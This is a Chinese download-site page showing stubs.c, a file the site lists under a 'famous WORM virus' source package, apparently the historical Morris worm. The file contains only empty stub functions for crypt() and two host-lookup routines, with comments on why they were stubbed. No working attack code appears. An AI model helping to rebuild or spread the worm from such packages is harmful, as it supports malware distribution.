⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 stubs.c

📁 著名的WORM病毒。 在UNIX/LINUX下可以编译成功。 注意看MAKEFILE。
💻 C
字号:
/* dover *//*  The version of crypt() used in the worm program has the same tables as * Berkeley's 4.3 crypt(), but uses different code.  Since I don't know where * we put our 4.2 tape I can't check it against that code to find the exact * source.  I assume that it just a regualar crypt() routine with several * interior functions declared static, perhaps tuned somewhat for speed on the * VAX and Sun. */crypt(){ }    /* These might not be copyrighted, but I'm not taking the chance.  They are   obvious. */h_addr2host(){}h_name2host(){}/* * Local variables: * compile-command: "make test" * comment-column: 48 * End: */

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -